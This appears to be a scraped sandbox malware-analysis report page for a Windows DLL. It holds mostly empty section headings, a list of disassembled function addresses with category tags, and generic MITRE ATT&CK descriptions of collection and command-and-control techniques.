Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Microsoft.ApplicationInsights.PersistenceChannel.dll

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 00B0D8BE, Relevance: .5, Instructions: 534
COMMONCrypto

Function 0040B0B0, Relevance: 203.3, APIs: 135, Instructions: 820
libraryloaderCOMMON

Function 00403E70, Relevance: 94.8, APIs: 50, Strings: 4, Instructions: 301
stringnetworkmemoryCOMMON

Function 00407560, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 301
fileCOMMON

Function 004011F0, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 134
fileCOMMON

Function 0040A840, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 156
COMMON

Function 00401000, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 95
fileCOMMON

Function 00408820, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 183
fileCOMMON

Function 00409930, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
memoryCOMMON

Function 00405E20, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Function 00409850, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39
memorytimeCOMMON

Function 00403C80, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
memoryCOMMON

Function 004062D0, Relevance: 4.5, APIs: 3, Instructions: 49
memoryencryptionCOMMON

Function 004097B0, Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Function 00405740, Relevance: 4.5, APIs: 3, Instructions: 18
sleepCOMMON

Function 0040AF00, Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 106
libraryloaderCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre